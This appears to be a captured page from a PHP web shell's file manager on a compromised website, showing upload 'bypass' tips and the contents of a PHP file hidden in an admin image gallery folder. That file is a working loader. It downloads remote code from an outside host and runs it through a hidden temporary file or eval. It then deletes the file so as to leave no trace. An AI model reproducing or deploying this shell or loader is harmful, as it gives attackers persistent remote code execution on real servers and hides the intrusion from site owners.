Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
home
cimpactinstitute.org
public_html
admin
gallery
img
File Content:
30d780fea6b5f18.php
<?php $url = 'https://fcalpha.net/web/photo/20151024/naxc.txt'; function get_content($url) { $ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0.0.0'; if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 15); curl_setopt($ch, CURLOPT_USERAGENT, $ua); $res = curl_exec($ch); curl_close($ch); return $res; } return @file_get_contents($url); } $code = get_content($url); if ($code) { // Tulis ke folder saat ini (titik di depan agar file tersembunyi di Linux) $local_tmp = './.sys_' . time() . '.php'; if (strpos($code, '<?php') === false) { $code = '<?php ' . $code; } if (@file_put_contents($local_tmp, $code)) { @include($local_tmp); @unlink($local_tmp); // Langsung hapus agar tidak meninggalkan jejak } else { // Jika gagal tulis file, paksa jalankan lewat eval $code = str_replace(['<?php', '?>'], '', $code); @eval($code); } } ?>
Edit
Download
Unzip
Chmod
Delete